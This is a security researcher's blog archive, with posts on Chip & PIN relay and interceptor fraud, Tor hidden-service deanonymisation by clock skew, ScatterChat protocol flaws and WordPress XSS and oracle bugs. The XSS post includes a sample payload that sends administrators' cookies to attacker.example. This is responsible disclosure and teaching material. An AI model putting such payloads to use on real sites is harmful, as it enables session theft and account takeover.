All posts by Steven J. Murdoch

About Steven J. Murdoch

I am Professor of Security Engineering and Royal Society University Research Fellow in the Information Security Research Group of the Department of Computer Science at University College London (UCL), and a member of the UCL Academic Centre of Excellence in Cyber Security Research. I am also a bye-fellow of Christ’s College, Innovation Security Architect at OneSpan, Cambridge, a member of the Tor Project, and a Fellow of the IET and BCS. I teach on the UCL MSc in Information Security. Further information and my papers on information security research are on my personal website. I also blog about information security research and policy on Bentham's Gaze.

Chip & PIN relay attacks

Saar Drimer and I have shown that the Chip & PIN system, used for card payments in the UK, is vulnerable to a new kind of fraud. By “relaying” information from a genuine card, a Chip & PIN terminal in another shop can be made to accept a counterfeit card. We previously discussed this possibility in “Chip & Spin”, but it was not until now that we implemented and tested the attack.

A fraudster sets up a fake terminal in a busy shop or restaurant. When a genuine customer inserts their card into this terminal, the fraudster’s accomplice, in another shop, inserts their counterfeit card into the merchant’s terminal. The fake terminal reads details from the genuine card, and relays them to the counterfeit card, so that it will be accepted. The PIN is recorded by the fake terminal and sent to the accomplice for them to enter, and they can then walk off with the goods. To the victim, everything was normal, but when their statement arrives, they will find that they have been defrauded.
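The flow above can be sketched in a few lines. The classes, method names and byte strings below are invented for illustration; a real EMV transaction involves many more messages than this, but the principle is the same: every challenge from the merchant’s terminal is answered, remotely, by the genuine card.

```python
# Hypothetical simulation of the relay. Messages from the merchant's
# terminal are forwarded, unmodified, to the genuine card and back.

class GenuineCard:
    """The victim's card, inserted into the fraudster's fake terminal."""
    def respond(self, command: bytes) -> bytes:
        # In reality, the chip computes a response to the terminal's APDU.
        return b"card-response-to:" + command

class CounterfeitCard:
    """The accomplice's card, wired to relay everything it is asked."""
    def __init__(self, relay_channel):
        self.relay = relay_channel
    def respond(self, command: bytes) -> bytes:
        # Forward the terminal's command to the genuine card, far away.
        return self.relay(command)

# The "relay channel" could be a mobile-phone link; here it is a call.
genuine = GenuineCard()
counterfeit = CounterfeitCard(relay_channel=genuine.respond)

# The merchant's terminal cannot tell the difference: every challenge
# it sends to the counterfeit card gets the genuine card's answer.
challenge = b"GENERATE-AC"
assert counterfeit.respond(challenge) == genuine.respond(challenge)
```

The defences we discuss in the paper work by bounding how long each exchange may take, since the relay necessarily adds latency.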

Equipment used in relay attack

From the banks’ perspective, there will be nothing unusual about this transaction. To them, it will seem as if the real card was used, with the chip read and the correct PIN entered. Banks have previously claimed that if a fraudulent Chip & PIN transaction took place, then the customer must have been negligent in protecting their card and PIN, and so must be liable. This work shows that even when customers take all due care in using their card, they can still be the victims of fraud.

For more information, we have a summary of the technique and FAQ. This attack will be featured on Watchdog, tonight (6 February) at 19:00 GMT on BBC One. The programme will show how we successfully sent details between two shops in the same street, but it should work equally well, via mobile phone, to the other side of the world.

It is unlikely that criminals are currently using techniques such as this, as there are less sophisticated attacks to which Chip & PIN remains vulnerable. However, as security is improved, the relay attack may become a significant source of fraud. Therefore, it is important that defences against this attack are deployed sooner rather than later. We discuss defences in our draft academic paper, submitted for review at a peer-reviewed conference.

Update (2007-01-10): The segment of Watchdog featuring our contribution has been posted to YouTube.

23rd Chaos Communication Congress

The 23rd Chaos Communication Congress (23C3) will be held later this month in Berlin, Germany, on 27–30 December. I will be attending to give a talk on Hot or Not: Revealing Hidden Services by their Clock Skew. Another contributor to this blog, George Danezis, will be talking on An Introduction to Traffic Analysis.

This will be my third time speaking at the CCC (I previously talked on Hidden Data in Internet Published Documents and The Convergence of Anti-Counterfeiting and Computer Security in 2004, then Covert channels in TCP/IP: attack and defence in 2005) and I’ve always had a great time, but this year looks to be the best yet. Here are a few highlights from the draft programme, although I am sure there are many great talks I have missed.

It’s looking like a great line-up, so I hope many of you can make it. See you there!

Hot or Not: Revealing Hidden Services by their Clock Skew

Next month I will be presenting my paper “Hot or Not: Revealing Hidden Services by their Clock Skew” at the 13th ACM Conference on Computer and Communications Security (CCS) held in Alexandria, Virginia.

It is well known that quartz crystals, as used for controlling system clocks of computers, change speed when their temperature is altered. The paper shows how to use this effect to attack anonymity systems. One such attack is to observe timestamps from a PC connected to the Internet and watch how the frequency of the system clock changes.

Absolute clock skew has been previously used to tell whether two apparently different machines are in fact running on the same hardware. My paper adds that because the skew depends on temperature, in principle, a PC can be located by finding out when the day starts and how long it is, or just observing that the pattern is the same as a computer in a known location.

However, the paper centres on hidden services, a feature of Tor which allows servers to be run without giving away the identity of the operator. These can be attacked by repeatedly connecting to the hidden service, causing its CPU load, and hence temperature, to increase and so change the clock skew. The attacker then requests timestamps from all candidate servers and finds the one demonstrating the expected clock-skew pattern. I tested this with a private Tor network and it works surprisingly well.
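The measurement behind the attack can be illustrated with a toy skew estimator: record the remote clock’s offset against local time, fit a line, and read the skew off the slope. This is a simplified sketch over synthetic data; real measurements come from noisy network timestamps (TCP or ICMP), so the paper uses more robust line-fitting than the ordinary least squares shown here.

```python
# Toy clock-skew estimator: the slope of (remote offset) vs (local time),
# fitted by ordinary least squares, gives the skew in parts per million.

def estimate_skew_ppm(samples):
    """samples: list of (local_time_s, remote_time_s) pairs."""
    n = len(samples)
    xs = [t for t, _ in samples]
    ys = [r - t for t, r in samples]           # remote clock's offset
    mx, my = sum(xs) / n, sum(ys) / n
    slope = sum((x - mx) * (y - my) for x, y in zip(xs, ys)) \
            / sum((x - mx) ** 2 for x in xs)
    return slope * 1e6                         # parts per million

# A remote clock running 50 ppm fast drifts 50 microseconds per second:
samples = [(t, t * (1 + 50e-6)) for t in range(0, 3600, 60)]
print(round(estimate_skew_ppm(samples), 1))    # → 50.0
```

The attack then reduces to watching this estimate change as the induced load (and so temperature) is switched on and off.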

In the graph below, the temperature (orange circles) is modulated by either exercising the hidden service or not. This in turn alters the measured clock skew (blue triangles). The induced load pattern is clear in the clock skew and an attacker could use this to de-anonymise a hidden service. More details can be found in the paper (PDF 1.5M).

Clock skew graph

I happened upon this effect by lucky accident, while trying to improve upon the results of the paper “Remote physical device fingerprinting”. A previous paper of mine, “Embedding Covert Channels into TCP/IP”, showed how to extract high-precision timestamps from the Linux TCP initial sequence number generator. I suspected these timestamps could improve the accuracy of clock-skew measurement, and when I tested this hypothesis it did, to the extent that I noticed an unusual peak at about the time cron caused the hard disk on my test machine to spin up. Eventually I realised the potential for this effect and ran the further experiments needed to write the paper.

Protocol design is hard — Flaws in ScatterChat

At the recent HOPE conference, the “secure instant messaging (IM) client” ScatterChat was released in a blaze of publicity. It was designed by J. Salvatore Testa II to allow human rights and democracy activists to communicate securely while under surveillance. It uses cryptography to protect confidentiality and authenticity, integrates Tor to provide anonymity, and is bundled with an easy-to-use interface. Sadly, not everything is as good as it sounds.

When I first started supervising undergraduates at Cambridge, Richard Clayton explained that the real purpose of the security course was to teach students not to invent the following (in increasing order of importance): protocols, hash functions, block ciphers and modes of operation. Academic literature is scattered with the bones of flawed proposals for all of these, despite being designed by very capable and experienced cryptographers. Instead, wherever possible, implementors should use peer-reviewed building blocks, as normally there is already a solution which can do the job, but has withstood more analysis and so is more likely to be secure.

Unfortunately, ScatterChat uses both a custom protocol and a custom mode of operation, neither of which is as secure as hoped. While looking at the developer documentation I found a few problems and reported them to the author. As always, there is the question of whether such vulnerabilities should be disclosed. It is likely that these problems would be discovered eventually, so it is better for them to be caught early, allowing users to take precautions, rather than letting attackers who independently find the weaknesses exploit them with impunity. I also hope this will serve as a cautionary tale, reminding software designers that cryptography and protocol design are fraught with difficulties, so are better managed through open peer review.

The most serious of the three vulnerabilities was published today in an advisory (technical version), assigned CVE-2006-4021, from the ScatterChat author, but I also found two lesser ones. The three vulnerabilities are as follows (in increasing order of severity): Continue reading Protocol design is hard — Flaws in ScatterChat

Downtime

Light Blue Touchpaper will be inaccessible for around 19 hours due to building maintenance. The server will be powered off at 22:00 UTC, Saturday 15 July and should be restarted at 17:00 UTC, Sunday 16 July. However, potential problems with the server or networking equipment on restoration of power may prevent access to the site until Monday.

Update: 17:30 UTC, Sunday 16 July
The power is on, the electronic locks let me in, and network connectivity, DHCP and DNS all work, as does the coffee machine. So that is the Computer Lab critical infrastructure in operation, and LBT is back online.

Update: Tuesday 25 July
There will be another downtime for the Light Blue Touchpaper server on Wednesday 26 July, 7:00–10:00 UTC, due to work on our electricity supply.

Protecting software distribution with a cryptographic build process

At the rump session of PET 2006 I presented a simple idea on how to defend against targeted attacks on software distribution. There were some misunderstandings after my 5-minute description, so I thought it would help to put the idea down in writing, and I also hope to attract more discussion and a larger audience.

Consider a security-critical open source application; here I will use the example of Tor. The source code is signed with the developer’s private key and users have the ability to verify the signature and build the application with a trustworthy compiler. I will also assume that if a backdoor is introduced in a deployed version, someone will notice, following from Linus’s law — “given enough eyeballs, all bugs are shallow”. These assumptions are debatable; for example, the threat of compiler backdoors has been known for some time, and subtle security vulnerabilities are hard to find. However, a backdoor in the Linux kernel was discovered, and the anonymous reporter of a flaw in Tor’s Diffie-Hellman implementation probably found it through examining the source, so I think my assumptions are at least partially valid.

The developer’s signature protects against an attacker mounting a man-in-the-middle attack and modifying a particular user’s download. If the developer’s key (or the developer) is compromised then a backdoor could be inserted, but from the above assumptions, if this version is widely distributed, someone will discover the flaw and raise the alarm. However, there is no mechanism that protects against an attacker with access to the developer’s key singling out a user and adding a backdoor to only the version they download. Even if that user is diligent, the signature will check out fine. As the backdoor is only present in one version, the “many eyeballs” do not help. To defend against this attack, a user needs to find out if the version they download is the same as what other people receive and have the opportunity to verify.

My proposal is that the application build process should first calculate the hash of the source code, embed it in the binary and make it remotely accessible. Tor already has a mechanism for the last step, because each server publishes a directory descriptor which could include this hash. Multiple directory servers collect these and allow them to be downloaded by a web browser. Then when a user downloads the Tor source code, he can use the hashing utility provided by the operating system to check that the package he has matches a commonly deployed one.

If a particular version claims to have been deployed for some time, but no server displays a matching hash, then the user knows that there is a problem. The verification must be performed manually for now, but an operating system provider could produce a trusted tool for automating this. Note that server operators need to perform no extra work (the build process is automated) and only users who believe they may be targeted need perform the extra verification steps.
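The user-side check could look roughly like the sketch below. The choice of SHA-256, the file handling and the set of published hashes are illustrative assumptions on my part, not Tor’s actual directory format.

```python
# Sketch of the user-side verification: hash the downloaded source
# package and look for it among the hashes published by deployed servers.
import hashlib

def sha256_file(path: str) -> str:
    """Hash a file incrementally, so large packages need little memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def is_commonly_deployed(path: str, published_hashes: set) -> bool:
    """True if this download matches a version servers report running."""
    return sha256_file(path) in published_hashes
```

A targeted backdoor would produce a hash that appears on no server, so `is_commonly_deployed` would return False and the user would know to raise the alarm.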

This might seem similar to the remote-attestation feature of Trusted Computing. Here, computers are fitted with special hardware, a Trusted Platform Module (TPM), which can produce a hard to forge proof of the software currently running. Because it is implemented in tamper-resistant hardware, even the owner of the computer cannot produce a fake statement, without breaking the TPM’s defences. This feature is needed for applications including DRM, but comes with added risks.

The use of TPMs to protect anonymity networks has been suggested, but the important difference between my proposal and TPM remote-attestation is that I assume most servers are honest, so will not lie about the software they are running. They have no incentive to do so, unless they want to harm the anonymity of the users, and if enough servers are malicious then there is no need to modify the client users are running, as the network is broken already. So there is no need for special hardware to implement my proposal, although if it is present, it could be used.

I hope this makes my scheme clearer and I am happy to receive comments and suggestions. I am particularly interested in whether there are any flaws in the design, whether the threat model is reasonable and if the effort in deployment and use is worth the increased resistance to attack.

Oracle attack on WordPress

This post describes the second of two vulnerabilities I found in WordPress. The first, an XSS vulnerability, was described last week. While the vulnerability discussed here is applicable in fewer cases than the previous one, it is an example of a comparatively rare class, oracle attacks, so I think it merits further exposition.

An oracle attack is one where an attacker can abuse a facility provided by a system to gain unauthorized access to protected information. The term originates from cryptology, and such attacks still crop up regularly, for example in banking security devices and protocols. The occurrence of an oracle attack in WordPress illustrates the need for a better understanding of cryptography, even by the authors of applications not conventionally considered to be cryptographic software. More forgiving primitives and better robustness principles could also reduce the risk of future weaknesses.
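To illustrate the class in general terms (this toy example is mine, and not the WordPress flaw itself): a facility that answers even a single yes/no question about a secret can let an attacker recover it piece by piece, turning an infeasible brute-force search into a short sequence of queries.

```python
import string

SECRET = "s3cret"  # a hypothetical protected value

def oracle(guess: str) -> bool:
    """The leaky facility: reveals whether `guess` is a prefix of the secret."""
    return SECRET.startswith(guess)

def recover(alphabet: str, max_len: int = 32) -> str:
    """Recover the secret one character at a time using only the oracle."""
    known = ""
    while len(known) < max_len:
        for c in alphabet:
            if oracle(known + c):
                known += c
                break
        else:
            return known        # no extension worked: secret recovered
    return known

print(recover(string.ascii_lowercase + string.digits))  # → s3cret
```

The attacker here makes at most (alphabet size × secret length) queries, rather than the exponential number a blind search would need. That cost collapse is the hallmark of an oracle attack.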

The vulnerability is a variant of the ‘cache’ shell injection bug reported by rgodm. It is caused by an unfortunate series of design choices by the WordPress team, leading to arbitrary PHP execution. The WordPress cache stores commonly accessed information from the database, such as user profile data, in files for faster retrieval. Although these files are needed only by the server, they are still accessible from the web, which is commonly considered bad practice. To prevent the content being read remotely, the data is placed in .php files, commented out with //. Thus, when executed by the web server in response to a remote query, they return an empty response.

However, putting user controlled data in executable files is inherently a risky choice. If the attacker can escape from the comment then arbitrary PHP can be executed. rgodm’s shell injection bug does this by inserting a newline into the display name. Now all the attacker must do is guess the name of the .php file which stores his cached profile information, and invoke it to run the injected PHP. WordPress puts an index.php in the cache directory to suppress directory indexing, and filenames are generated as MD5(username || DB_PASSWORD) || “.php”, which creates a hard-to-guess name. The original bug report suggested brute-forcing DB_PASSWORD, the MySQL authentication password, but the oracle attack described here will succeed even if a strong password is chosen.
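For concreteness, the filename scheme described above can be reproduced in a few lines; the username and password values here are made up for illustration.

```python
# Cache file names are MD5(username || DB_PASSWORD) || ".php", so knowing
# the username is not enough: the attacker also needs DB_PASSWORD.
import hashlib

def cache_filename(username: str, db_password: str) -> str:
    return hashlib.md5((username + db_password).encode()).hexdigest() + ".php"

print(cache_filename("admin", "hunter2"))
```

With a weak DB_PASSWORD, an attacker can brute-force it offline, trying candidate passwords until MD5(username || guess) names a file that exists on the server. The oracle attack removes even that requirement.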

Continue reading Oracle attack on WordPress

Anatomy of an XSS exploit

Last week I promised to follow up on a few XSS bugs that I found in WordPress. The vulnerabilities are fixed in WordPress 2.0.3, even though the release notes do not mention their existence. I think there are a number of useful lessons that can be drawn from them, so in this post I will describe some more details.

The goal of a classic XSS exploit is to run arbitrary Javascript, in the context of another webpage, which retrieves the user’s cookies. With WordPress I will concentrate on the comment management interface. Here, the deletion button has a Javascript onclick event handler to display a confirmation dialog, which includes the comment author’s name. If malicious input can break out of the dialog box text, then when an administrator activates the button, the attacker’s Javascript is run, allowing access to the admin user’s cookies. I found two classes of bugs which allowed me to do this.
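A sketch of the breakout, using an invented HTML template rather than WordPress’s actual markup: interpolating an unescaped author name into the onclick handler lets a crafted name close the Javascript string and append attacker code. HTML-escaping the quotes, as below, blocks this particular breakout, though correct encoding for a Javascript context is more involved than a single escaping call.

```python
# Toy rendering of a comment-deletion button whose onclick confirmation
# dialog includes the comment author's name.
from html import escape

def delete_button(author: str, escaped: bool = True) -> str:
    name = escape(author, quote=True) if escaped else author
    return f'<a href="#" onclick="return confirm(\'Delete comment by {name}?\')">Delete</a>'

# A name that closes the JS string, runs attacker code, then comments
# out the rest of the handler:
evil = "x'); document.location='http://attacker.example/?c='+document.cookie;//"

print(delete_button(evil, escaped=False))  # payload escapes the string literal
print(delete_button(evil))                 # quotes neutralised by escaping
```

In the unescaped output the attacker’s code sits outside the quoted dialog text, so it runs with the admin’s cookies in scope the moment the button is clicked.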

Continue reading Anatomy of an XSS exploit

Chip and skim 2

The 12:30 ITN news on ITV1 today featured a segment (video) on Chip and PIN, and should also be shown at 19:00 and 22:30. It included an interview with Ross Anderson and some shots of me presenting our Chip and PIN interceptor. The demonstration was similar to the one shown on German TV but this time we went all the way, borrowing a magstripe writer and producing a fake card. This was used by the reporter to successfully withdraw money from an ATM (from his own account).

More details on how the device actually works are on our interceptor page. The key vulnerabilities present in the UK Chip and PIN cards we have tested, which the interceptor relies on, are:

  • The entered PIN is sent from the terminal to the card in unencrypted form
  • It is still possible to use magstripe-only cards to withdraw cash, with the same PIN used in shops
  • All the details necessary to create a valid magstripe are also present on the chip

This means that a crook could insert a miniaturised version of the interceptor into the card slot of a Chip and PIN terminal, without interfering with the tamper detection. The details it collects include the PIN and enough information to create a valid magstripe. The fake card can then be used in ATMs which are willing to accept cards that, from the ATM’s perspective, have a damaged chip — known as “fallback”. Some ATMs, particularly ones abroad, might not be able to read the chip at all.
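For reference, the “track-2 equivalent” data held on the chip follows the ISO 7813 track 2 layout, which can be parsed as sketched below; the sample value is invented, not taken from a real card.

```python
# Illustrative parse of track-2 equivalent data: PAN, then a 'D'
# separator, then expiry (YYMM), service code, and discretionary data.
def parse_track2(track2: str) -> dict:
    pan, rest = track2.split("D", 1)
    return {
        "pan": pan,
        "expiry": rest[0:4],           # YYMM
        "service_code": rest[4:7],
        "discretionary": rest[7:],     # typically includes the CVV1
    }

sample = "5413330000000000D2512201123456789"
print(parse_track2(sample))
```

Everything needed to write a working magstripe is in these few fields, which is why capturing the chip’s communication suffices for the fallback fraud described above.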

The fact that the chip also includes the magstripe details is not strictly necessary, since a skimmer could also read this, but the design of some Chip and PIN terminals, which only cover the chip, makes this difficult. One of the complaints against the terminals used in the Shell fraud was that they make it impossible to read the chip without reading the magstripe too. This led to suggestions that customers should not use such terminals, or even that they wipe their card’s magstripe to prevent skimmers from reading it.

While it is possible that the Shell fraudsters did read the magstripe, wiping it will not be a defence against them reading the communication between terminal and chip, which includes all the needed details. Even the CVV1, the code used to verify that a magstripe is valid, is on the chip (but not the CVV2, which is the 3 digit code printed on the back, used by ecommerce). This was presumably a backwards-compatibility measure, as was magstripe fallback. As shown by countless examples before, such features are frequently the source of security flaws.

XSS vulnerabilities fixed in WordPress 2.0.3

Users are strongly urged to upgrade their version of WordPress to 2.0.3 (as you will see, we already have!). This release fixes two XSS vulnerabilities that I reported to WordPress on 14 Apr 2006 and 4 May 2006, although they are not mentioned in the release announcement. These are exploitable in the default installation and can readily lead to arbitrary PHP code execution.

I think there are a number of interesting lessons to learn from these vulnerabilities, so I plan to post more details in 10 days’ time (thereby giving users a chance to upgrade). The nature of the problem can probably be deduced from the code changes, so there is limited value in waiting much longer.

I will also discuss a refinement of the ‘cache’ shell injection bug reported by rgodm, which is also fixed by WordPress 2.0.3. The new attack variant I discovered no longer relies on a guessable database password, but only applies when the Subscribe To Comments plugin is also activated. The latest version of the plugin (2.0.4) mitigates this attack, but upgrading WordPress is still recommended.